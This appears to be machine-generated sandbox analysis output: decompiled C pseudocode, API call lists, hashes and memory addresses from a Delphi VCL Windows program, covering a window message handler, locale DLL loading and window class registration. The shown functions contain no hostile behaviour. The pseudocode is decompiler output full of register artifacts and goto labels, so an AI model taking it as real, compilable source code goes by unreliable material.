                                                                                • Instruction Fuzzy Hash: 11514B71A4060C7AFB25D6A4CC46FEF76ACDB04744F4040B7BA44F65C1EA789A448FA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E004548A0(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
                                                                                				struct HWND__* _v8;
                                                                                				struct HWND__* _v12;
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t161;
                                                                                				struct HWND__* _t162;
                                                                                				struct HWND__* _t163;
                                                                                				void* _t166;
                                                                                				struct HWND__* _t176;
                                                                                				struct HWND__* _t185;
                                                                                				struct HWND__* _t188;
                                                                                				struct HWND__* _t189;
                                                                                				struct HWND__* _t191;
                                                                                				struct HWND__* _t197;
                                                                                				struct HWND__* _t199;
                                                                                				struct HWND__* _t202;
                                                                                				struct HWND__* _t205;
                                                                                				struct HWND__* _t206;
                                                                                				struct HWND__* _t216;
                                                                                				struct HWND__* _t217;
                                                                                				struct HWND__* _t222;
                                                                                				struct HWND__* _t224;
                                                                                				struct HWND__* _t227;
                                                                                				struct HWND__* _t231;
                                                                                				struct HWND__* _t245;
                                                                                				struct HWND__* _t249;
                                                                                				struct HWND__* _t251;
                                                                                				struct HWND__* _t252;
                                                                                				struct HWND__* _t264;
                                                                                				intOrPtr _t267;
                                                                                				struct HWND__* _t270;
                                                                                				intOrPtr* _t271;
                                                                                				struct HWND__* _t279;
                                                                                				struct HWND__* _t281;
                                                                                				struct HWND__* _t292;
                                                                                				void* _t301;
                                                                                				signed int _t303;
                                                                                				struct HWND__* _t309;
                                                                                				struct HWND__* _t310;
                                                                                				struct HWND__* _t311;
                                                                                				void* _t312;
                                                                                				intOrPtr _t335;
                                                                                				struct HWND__* _t339;
                                                                                				intOrPtr _t361;
                                                                                				void* _t365;
                                                                                				struct HWND__* _t370;
                                                                                				void* _t371;
                                                                                				void* _t372;
                                                                                				intOrPtr _t373;
                                                                                
                                                                                				_t312 = __ecx;
                                                                                				_push(_t365);
                                                                                				_v12 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_push(_t372);
                                                                                				_push(0x454f30);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t373;
                                                                                				 *(_v12 + 0xc) = 0;
                                                                                				_t301 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
                                                                                				if(_t301 < 0) {
                                                                                					L5:
                                                                                					E00454754(_v8, _t312, _v12);
                                                                                					_t303 =  *_v12;
                                                                                					_t161 = _t303;
                                                                                					__eflags = _t161 - 0x53;
                                                                                					if(__eflags > 0) {
                                                                                						__eflags = _t161 - 0xb017;
                                                                                						if(__eflags > 0) {
                                                                                							__eflags = _t161 - 0xb020;
                                                                                							if(__eflags > 0) {
                                                                                								_t162 = _t161 - 0xb031;
                                                                                								__eflags = _t162;
                                                                                								if(_t162 == 0) {
                                                                                									_t163 = _v12;
                                                                                									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
                                                                                									if( *((intOrPtr*)(_t163 + 4)) != 1) {
                                                                                										 *(_v8 + 0xb0) =  *(_v12 + 8);
                                                                                									} else {
                                                                                										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
                                                                                									}
                                                                                									L99:
                                                                                									_t166 = 0;
                                                                                									_pop(_t335);
                                                                                									 *[fs:eax] = _t335;
                                                                                									goto L100;
                                                                                								}
                                                                                								__eflags = _t162 + 0xfffffff2 - 2;
                                                                                								if(_t162 + 0xfffffff2 - 2 < 0) {
                                                                                									 *(_v12 + 0xc) = E004567F8(_v8,  *(_v12 + 8), _t303) & 0x0000007f;
                                                                                								} else {
                                                                                									L98:
                                                                                									E00454818(_t372); // executed
                                                                                								}
                                                                                								goto L99;
                                                                                							}
                                                                                							if(__eflags == 0) {
                                                                                								_t176 = _v12;
                                                                                								__eflags =  *(_t176 + 4);
                                                                                								if( *(_t176 + 4) != 0) {
                                                                                									E0045549C(_v8, _t312,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                                                                								} else {
                                                                                									E00455440(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                                                                								}
                                                                                								goto L99;
                                                                                							}
                                                                                							_t185 = _t161 - 0xb01a;
                                                                                							__eflags = _t185;
                                                                                							if(_t185 == 0) {
                                                                                								_t188 = IsIconic( *(_v8 + 0x30));
                                                                                								__eflags = _t188;
                                                                                								if(_t188 == 0) {
                                                                                									_t189 = GetFocus();
                                                                                									_t339 = _v8;
                                                                                									__eflags = _t189 -  *((intOrPtr*)(_t339 + 0x30));
                                                                                									if(_t189 ==  *((intOrPtr*)(_t339 + 0x30))) {
                                                                                										_t191 = E0044C7E0(0);
                                                                                										__eflags = _t191;
                                                                                										if(_t191 != 0) {
                                                                                											SetFocus(_t191);
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                								goto L99;
                                                                                							}
                                                                                							__eflags = _t185 == 5;
                                                                                							if(_t185 == 5) {
                                                                                								L88:
                                                                                								E00455980(_v8,  *(_v12 + 8),  *(_v12 + 4));
                                                                                								goto L99;
                                                                                							} else {
                                                                                								goto L98;
                                                                                							}
                                                                                						}
                                                                                						if(__eflags == 0) {
                                                                                							_t197 =  *(_v8 + 0x44);
                                                                                							__eflags = _t197;
                                                                                							if(_t197 != 0) {
                                                                                								_t367 = _t197;
                                                                                								_t199 = E0043BD14(_t197);
                                                                                								__eflags = _t199;
                                                                                								if(_t199 != 0) {
                                                                                									_t202 = IsWindowEnabled(E0043BD14(_t367));
                                                                                									__eflags = _t202;
                                                                                									if(_t202 != 0) {
                                                                                										_t205 = IsWindowVisible(E0043BD14(_t367));
                                                                                										__eflags = _t205;
                                                                                										if(_t205 != 0) {
                                                                                											 *0x46bb18 = 0;
                                                                                											_t206 = GetFocus();
                                                                                											SetFocus(E0043BD14(_t367));
                                                                                											E00436848(_t367,  *(_v12 + 4), 0x112,  *(_v12 + 8));
                                                                                											SetFocus(_t206);
                                                                                											 *0x46bb18 = 1;
                                                                                											 *(_v12 + 0xc) = 1;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                							goto L99;
                                                                                						}
                                                                                						__eflags = _t161 - 0xb000;
                                                                                						if(__eflags > 0) {
                                                                                							_t216 = _t161 - 0xb001;
                                                                                							__eflags = _t216;
                                                                                							if(_t216 == 0) {
                                                                                								_t217 = _v8;
                                                                                								__eflags =  *((short*)(_t217 + 0xf2));
                                                                                								if( *((short*)(_t217 + 0xf2)) != 0) {
                                                                                									 *((intOrPtr*)(_v8 + 0xf0))();
                                                                                								}
                                                                                								goto L99;
                                                                                							}
                                                                                							__eflags = _t216 == 0x15;
                                                                                							if(_t216 == 0x15) {
                                                                                								_t222 = E00455318(_v8, _t312, _v12);
                                                                                								__eflags = _t222;
                                                                                								if(_t222 != 0) {
                                                                                									 *(_v12 + 0xc) = 1;
                                                                                								}
                                                                                								goto L99;
                                                                                							} else {
                                                                                								goto L98;
                                                                                							}
                                                                                						}
                                                                                						if(__eflags == 0) {
                                                                                							_t224 = _v8;
                                                                                							__eflags =  *((short*)(_t224 + 0xfa));
                                                                                							if( *((short*)(_t224 + 0xfa)) != 0) {
                                                                                								 *((intOrPtr*)(_v8 + 0xf8))();
                                                                                							}
                                                                                							goto L99;
                                                                                						}
                                                                                						_t227 = _t161 - 0x112;
                                                                                						__eflags = _t227;
                                                                                						if(_t227 == 0) {
                                                                                							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
                                                                                							__eflags = _t231;
                                                                                							if(_t231 == 0) {
                                                                                								E00454F94(_v8);
                                                                                							} else {
                                                                                								__eflags = _t231 == 0x100;
                                                                                								if(_t231 == 0x100) {
                                                                                									E00455044(_v8);
                                                                                								} else {
                                                                                									E00454818(_t372);
                                                                                								}
                                                                                							}
                                                                                							goto L99;
                                                                                						}
                                                                                						__eflags = _t227 + 0xffffffe0 - 7;
                                                                                						if(_t227 + 0xffffffe0 - 7 < 0) {
                                                                                							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t303 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
                                                                                							goto L99;
                                                                                						} else {
                                                                                							goto L98;
                                                                                						}
                                                                                					}
                                                                                					if(__eflags == 0) {
                                                                                						goto L88;
                                                                                					}
                                                                                					__eflags = _t161 - 0x16;
                                                                                					if(__eflags > 0) {
                                                                                						__eflags = _t161 - 0x1d;
                                                                                						if(__eflags > 0) {
                                                                                							_t245 = _t161 - 0x37;
                                                                                							__eflags = _t245;
                                                                                							if(_t245 == 0) {
                                                                                								 *(_v12 + 0xc) = E00454F78(_v8);
                                                                                								goto L99;
                                                                                							}
                                                                                							__eflags = _t245 == 0x13;
                                                                                							if(_t245 == 0x13) {
                                                                                								_t249 = _v12;
                                                                                								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) - 0xde534454;
                                                                                								if( *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) == 0xde534454) {
                                                                                									_t251 = _v8;
                                                                                									__eflags =  *((char*)(_t251 + 0x9e));
                                                                                									if( *((char*)(_t251 + 0x9e)) != 0) {
                                                                                										_t252 = _v8;
                                                                                										__eflags =  *(_t252 + 0xa0);
                                                                                										if( *(_t252 + 0xa0) != 0) {
                                                                                											 *(_v12 + 0xc) = 0;
                                                                                										} else {
                                                                                											_t309 = E0040BAFC("vcltest3.dll", _t303, 0x8000);
                                                                                											 *(_v8 + 0xa0) = _t309;
                                                                                											__eflags = _t309;
                                                                                											if(_t309 == 0) {
                                                                                												 *(_v12 + 0xc) = GetLastError();
                                                                                												 *(_v8 + 0xa0) = 0;
                                                                                											} else {
                                                                                												 *(_v12 + 0xc) = 0;
                                                                                												_t370 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
                                                                                												_t310 = _t370;
                                                                                												__eflags = _t370;
                                                                                												if(_t370 != 0) {
                                                                                													_t264 =  *(_v12 + 8);
                                                                                													_t310->i( *((intOrPtr*)(_t264 + 4)),  *((intOrPtr*)(_t264 + 8)));
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                								goto L99;
                                                                                							} else {
                                                                                								goto L98;
                                                                                							}
                                                                                						}
                                                                                						if(__eflags == 0) {
                                                                                							_t267 =  *0x487c00; // 0x22e0f1c
                                                                                							E00453DBC(_t267);
                                                                                							E00454818(_t372);
                                                                                							goto L99;
                                                                                						}
                                                                                						_t270 = _t161 - 0x1a;
                                                                                						__eflags = _t270;
                                                                                						if(_t270 == 0) {
                                                                                							_t271 =  *0x486d80; // 0x487b64
                                                                                							E00440560( *_t271, _t312,  *(_v12 + 4));
                                                                                							E004547AC(_v8, _t303, _t312, _v12, _t365);
                                                                                							E00454818(_t372);
                                                                                							goto L99;
                                                                                						}
                                                                                						__eflags = _t270 == 2;
                                                                                						if(_t270 == 2) {
                                                                                							E00454818(_t372);
                                                                                							_t279 = _v12;
                                                                                							__eflags =  *((intOrPtr*)(_t279 + 4)) - 1;
                                                                                							asm("sbb eax, eax");
                                                                                							 *((char*)(_v8 + 0x9d)) = _t279 + 1;
                                                                                							_t281 = _v12;
                                                                                							__eflags =  *(_t281 + 4);
                                                                                							if( *(_t281 + 4) == 0) {
                                                                                								E004546A8();
                                                                                								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
                                                                                							} else {
                                                                                								E004546B8(_v8);
                                                                                								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
                                                                                							}
                                                                                							goto L99;
                                                                                						} else {
                                                                                							goto L98;
                                                                                						}
                                                                                					}
                                                                                					if(__eflags == 0) {
                                                                                						_t292 = _v12;
                                                                                						__eflags =  *(_t292 + 4);
                                                                                						if( *(_t292 + 4) != 0) {
                                                                                							 *((char*)(_v8 + 0x9c)) = 1;
                                                                                						}
                                                                                						goto L99;
                                                                                					}
                                                                                					__eflags = _t161 - 0x14;
                                                                                					if(_t161 > 0x14) {
                                                                                						goto L98;
                                                                                					}
                                                                                					switch( *((intOrPtr*)(_t161 * 4 +  &M00454944))) {
                                                                                						case 0:
                                                                                							__eax = E0041B790();
                                                                                							goto L99;
                                                                                						case 1:
                                                                                							goto L98;
                                                                                						case 2:
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_push(0xb01a);
                                                                                							_v8 =  *(_v8 + 0x30);
                                                                                							_push( *(_v8 + 0x30));
                                                                                							L00407040();
                                                                                							__eax = E00454818(__ebp);
                                                                                							goto L99;
                                                                                						case 3:
                                                                                							__eax = _v12;
                                                                                							__eflags =  *(__eax + 4);
                                                                                							if( *(__eax + 4) == 0) {
                                                                                								__eax = E00454818(__ebp);
                                                                                								__eax = _v8;
                                                                                								__eflags =  *(__eax + 0xac);
                                                                                								if( *(__eax + 0xac) == 0) {
                                                                                									__eax = _v8;
                                                                                									__eax =  *(_v8 + 0x30);
                                                                                									__eax = E0044C690( *(_v8 + 0x30), __ebx, __edi, __esi);
                                                                                									__edx = _v8;
                                                                                									 *(_v8 + 0xac) = __eax;
                                                                                								}
                                                                                								_v8 = L004546B0();
                                                                                							} else {
                                                                                								_v8 = E004546B8(_v8);
                                                                                								__eax = _v8;
                                                                                								__eax =  *(_v8 + 0xac);
                                                                                								__eflags = __eax;
                                                                                								if(__eax != 0) {
                                                                                									__eax = _v8;
                                                                                									__edx = 0;
                                                                                									__eflags = 0;
                                                                                									 *(_v8 + 0xac) = 0;
                                                                                								}
                                                                                								__eax = E00454818(__ebp);
                                                                                							}
                                                                                							goto L99;
                                                                                						case 4:
                                                                                							__eax = _v8;
                                                                                							__eax =  *(_v8 + 0x30);
                                                                                							_push(__eax);
                                                                                							L00406FA0();
                                                                                							__eflags = __eax;
                                                                                							if(__eax == 0) {
                                                                                								__eax = E00454818(__ebp);
                                                                                							} else {
                                                                                								__eax = E00454854(__ebp);
                                                                                							}
                                                                                							goto L99;
                                                                                						case 5:
                                                                                							__eax = _v8;
                                                                                							__eax =  *(_v8 + 0x44);
                                                                                							__eflags = __eax;
                                                                                							if(__eax != 0) {
                                                                                								__eax = E00452024(__eax, __ecx);
                                                                                							}
                                                                                							goto L99;
                                                                                						case 6:
                                                                                							__eax = _v12;
                                                                                							 *_v12 = 0x27;
                                                                                							__eax = E00454818(__ebp);
                                                                                							goto L99;
                                                                                					}
                                                                                				} else {
                                                                                					_t311 = _t301 + 1;
                                                                                					_t371 = 0;
                                                                                					L2:
                                                                                					L2:
                                                                                					if( *((intOrPtr*)(E00413FA4( *((intOrPtr*)(_v8 + 0xa8)), _t371)))() == 0) {
                                                                                						goto L4;
                                                                                					} else {
                                                                                						_t166 = 0;
                                                                                						_pop(_t361);
                                                                                						 *[fs:eax] = _t361;
                                                                                					}
                                                                                					L100:
                                                                                					return _t166;
                                                                                					L4:
                                                                                					_t371 = _t371 + 1;
                                                                                					_t311 = _t311 - 1;
                                                                                					__eflags = _t311;
                                                                                					if(_t311 != 0) {
                                                                                						goto L2;
                                                                                					}
                                                                                					goto L5;
                                                                                				}
                                                                                			}





















































                                                                                0x00454df2
                                                                                0x00454df2
                                                                                0x00000000
                                                                                0x00454de0
                                                                                0x004549eb
                                                                                0x004549eb
                                                                                0x004549f0
                                                                                0x00454a69
                                                                                0x00454a69
                                                                                0x00454a6e
                                                                                0x00454a7c
                                                                                0x00454a70
                                                                                0x00454a70
                                                                                0x00454a75
                                                                                0x00454a89
                                                                                0x00454a77
                                                                                0x00454a94
                                                                                0x00454a99
                                                                                0x00454a75
                                                                                0x00000000
                                                                                0x00454a6e
                                                                                0x004549f5
                                                                                0x004549f8
                                                                                0x00454c21
                                                                                0x00000000
                                                                                0x004549fe
                                                                                0x00000000
                                                                                0x004549fe
                                                                                0x004549f8
                                                                                0x00454923
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454929
                                                                                0x0045492c
                                                                                0x00454998
                                                                                0x0045499b
                                                                                0x004549ba
                                                                                0x004549ba
                                                                                0x004549bd
                                                                                0x00454aff
                                                                                0x00000000
                                                                                0x00454aff
                                                                                0x004549c3
                                                                                0x004549c6
                                                                                0x00454c45
                                                                                0x00454c4b
                                                                                0x00454c51
                                                                                0x00454c57
                                                                                0x00454c5a
                                                                                0x00454c61
                                                                                0x00454c67
                                                                                0x00454c6a
                                                                                0x00454c71
                                                                                0x00454cf1
                                                                                0x00454c73
                                                                                0x00454c82
                                                                                0x00454c87
                                                                                0x00454c8d
                                                                                0x00454c8f
                                                                                0x00454cd9
                                                                                0x00454ce1
                                                                                0x00454c91
                                                                                0x00454c96
                                                                                0x00454cad
                                                                                0x00454caf
                                                                                0x00454cb1
                                                                                0x00454cb3
                                                                                0x00454cbc
                                                                                0x00454cca
                                                                                0x00454cca
                                                                                0x00454cb3
                                                                                0x00454c8f
                                                                                0x00454c71
                                                                                0x00454c61
                                                                                0x00000000
                                                                                0x004549cc
                                                                                0x00000000
                                                                                0x004549cc
                                                                                0x004549c6
                                                                                0x0045499d
                                                                                0x00454f05
                                                                                0x00454f0a
                                                                                0x00454f10
                                                                                0x00000000
                                                                                0x00454f15
                                                                                0x004549a3
                                                                                0x004549a3
                                                                                0x004549a6
                                                                                0x00454ee5
                                                                                0x00454eec
                                                                                0x00454ef7
                                                                                0x00454efd
                                                                                0x00000000
                                                                                0x00454f02
                                                                                0x004549ac
                                                                                0x004549af
                                                                                0x00454b29
                                                                                0x00454b2f
                                                                                0x00454b32
                                                                                0x00454b36
                                                                                0x00454b3c
                                                                                0x00454b42
                                                                                0x00454b45
                                                                                0x00454b49
                                                                                0x00454b70
                                                                                0x00454b85
                                                                                0x00454b4b
                                                                                0x00454b4e
                                                                                0x00454b63
                                                                                0x00454b63
                                                                                0x00000000
                                                                                0x004549b5
                                                                                0x00000000
                                                                                0x004549b5
                                                                                0x004549af
                                                                                0x0045492e
                                                                                0x00454c29
                                                                                0x00454c2c
                                                                                0x00454c30
                                                                                0x00454c39
                                                                                0x00454c39
                                                                                0x00000000
                                                                                0x00454c30
                                                                                0x00454934
                                                                                0x00454937
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045493d
                                                                                0x00000000
                                                                                0x00454f18
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454b07
                                                                                0x00454b09
                                                                                0x00454b0b
                                                                                0x00454b13
                                                                                0x00454b16
                                                                                0x00454b17
                                                                                0x00454b1d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454b8f
                                                                                0x00454b92
                                                                                0x00454b96
                                                                                0x00454bca
                                                                                0x00454bd0
                                                                                0x00454bd3
                                                                                0x00454bda
                                                                                0x00454bdc
                                                                                0x00454bdf
                                                                                0x00454be2
                                                                                0x00454be7
                                                                                0x00454bea
                                                                                0x00454bea
                                                                                0x00454bf3
                                                                                0x00454b98
                                                                                0x00454b9b
                                                                                0x00454ba0
                                                                                0x00454ba3
                                                                                0x00454ba9
                                                                                0x00454bab
                                                                                0x00454bb2
                                                                                0x00454bb5
                                                                                0x00454bb5
                                                                                0x00454bb7
                                                                                0x00454bb7
                                                                                0x00454bbe
                                                                                0x00454bc3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454ab7
                                                                                0x00454aba
                                                                                0x00454abd
                                                                                0x00454abe
                                                                                0x00454ac3
                                                                                0x00454ac5
                                                                                0x00454ad4
                                                                                0x00454ac7
                                                                                0x00454ac8
                                                                                0x00454acd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454a9f
                                                                                0x00454aa2
                                                                                0x00454aa5
                                                                                0x00454aa7
                                                                                0x00454aad
                                                                                0x00454aad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454adf
                                                                                0x00454ae2
                                                                                0x00454ae9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004548d6
                                                                                0x004548d6
                                                                                0x004548d7
                                                                                0x00000000
                                                                                0x004548d9
                                                                                0x004548f5
                                                                                0x00000000
                                                                                0x004548f7
                                                                                0x004548f7
                                                                                0x004548f9
                                                                                0x004548fc
                                                                                0x004548fc
                                                                                0x00454f45
                                                                                0x00454f4b
                                                                                0x00454904
                                                                                0x00454904
                                                                                0x00454905
                                                                                0x00454905
                                                                                0x00454906
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454906

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RegisterAutomation$d{H$vcltest3.dll
                                                                                • API String ID: 0-2387504366
                                                                                • Opcode ID: e26ccd446a316f4fbb8a516c3d14ae18cd1f500151cd010e907ea5265a56c9f3
                                                                                • Instruction ID: 8ad9d7c783a2c6ce4ebe263d3ed71b4ee7457bda608aaccbfb27e864ecc426a2
                                                                                • Opcode Fuzzy Hash: e26ccd446a316f4fbb8a516c3d14ae18cd1f500151cd010e907ea5265a56c9f3
                                                                                • Instruction Fuzzy Hash: B5E18F35A04205EFD700DB5DC985A5EB7B0AB8831AF2580A6EC049F753D738EEC9DB49
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 61%
                                                                                			E00405D84() {
                                                                                				void* _t28;
                                                                                				void* _t30;
                                                                                				struct HINSTANCE__* _t36;
                                                                                				struct HINSTANCE__* _t42;
                                                                                				char* _t51;
                                                                                				void* _t52;
                                                                                				struct HINSTANCE__* _t59;
                                                                                				void* _t61;
                                                                                
                                                                                				_push(0x105);
                                                                                				_push( *((intOrPtr*)(_t61 - 4)));
                                                                                				_push(_t61 - 0x11d);
                                                                                				L00401310();
                                                                                				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
                                                                                				_t59 = 0;
                                                                                				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
                                                                                					L14:
                                                                                					return _t59;
                                                                                				} else {
                                                                                					_t28 = _t61 - 0x11d;
                                                                                					_push(_t28);
                                                                                					L00401318();
                                                                                					_t51 = _t28 + _t61 - 0x11d;
                                                                                					L5:
                                                                                					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
                                                                                						_t51 = _t51 - 1;
                                                                                						goto L5;
                                                                                					}
                                                                                					_t30 = _t61 - 0x11d;
                                                                                					if(_t51 != _t30) {
                                                                                						_t52 = _t51 + 1;
                                                                                						if( *((char*)(_t61 - 0x12)) != 0) {
                                                                                							_push(0x105 - _t52 - _t30);
                                                                                							_push(_t61 - 0x12);
                                                                                							_push(_t52);
                                                                                							L00401310();
                                                                                							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
                                                                                						}
                                                                                						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
                                                                                							_push(0x105 - _t52 - _t61 - 0x11d);
                                                                                							_push(_t61 - 0xd);
                                                                                							_push(_t52);
                                                                                							L00401310();
                                                                                							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                                                                							_t59 = _t36;
                                                                                							if(_t59 == 0) {
                                                                                								 *((char*)(_t61 - 0xb)) = 0;
                                                                                								_push(0x105 - _t52 - _t61 - 0x11d);
                                                                                								_push(_t61 - 0xd);
                                                                                								_push(_t52);
                                                                                								L00401310();
                                                                                								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                                                                								_t59 = _t42;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					goto L14;
                                                                                				}
                                                                                			}












                                                                                APIs
                                                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405D94
                                                                                • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DA1
                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DA7
                                                                                • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DD2
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E19
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E29
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E51
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E61
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405E87
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405E97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                • API String ID: 1599918012-2375825460
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 37%
                                                                                			E00454818(intOrPtr _a4) {
                                                                                				intOrPtr _t26;
                                                                                
                                                                                				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
                                                                                				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
                                                                                				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
                                                                                				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
                                                                                				_push(_t26); // executed
                                                                                				L00406CF8(); // executed
                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
                                                                                				return _t26;
                                                                                			}





                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00454842
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 42%
                                                                                			E00454384(void* __eax, void* __ebx, void* __ecx) {
                                                                                				struct _WNDCLASSA _v44;
                                                                                				char _v48;
                                                                                				char* _t22;
                                                                                				long _t23;
                                                                                				CHAR* _t25;
                                                                                				struct HINSTANCE__* _t26;
                                                                                				intOrPtr* _t28;
                                                                                				signed int _t31;
                                                                                				intOrPtr* _t32;
                                                                                				signed int _t35;
                                                                                				struct HINSTANCE__* _t36;
                                                                                				void* _t38;
                                                                                				CHAR* _t39;
                                                                                				struct HWND__* _t40;
                                                                                				char* _t46;
                                                                                				char* _t51;
                                                                                				long _t54;
                                                                                				long _t58;
                                                                                				struct HINSTANCE__* _t61;
                                                                                				intOrPtr _t63;
                                                                                				void* _t68;
                                                                                				struct HMENU__* _t69;
                                                                                				intOrPtr _t76;
                                                                                				void* _t82;
                                                                                				short _t87;
                                                                                
                                                                                				_v48 = 0;
                                                                                				_t68 = __eax;
                                                                                				_push(_t82);
                                                                                				_push(0x45451b);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t82 + 0xffffffd4;
                                                                                				if( *((char*)(__eax + 0xa4)) != 0) {
                                                                                					L13:
                                                                                					_pop(_t76);
                                                                                					 *[fs:eax] = _t76;
                                                                                					_push(0x454522);
                                                                                					return E00404320( &_v48);
                                                                                				}
                                                                                				_t22 =  *0x486cc4; // 0x487048
                                                                                				if( *_t22 != 0) {
                                                                                					goto L13;
                                                                                				}
                                                                                				_t23 = E0041C940(E004548A0, __eax); // executed
                                                                                				 *(_t68 + 0x40) = _t23;
                                                                                				_t25 =  *0x46bc2c; // 0x45406c
                                                                                				_t26 =  *0x487714; // 0x400000
                                                                                				if(GetClassInfoA(_t26, _t25,  &_v44) == 0) {
                                                                                					_t61 =  *0x487714; // 0x400000
                                                                                					 *0x46bc18 = _t61;
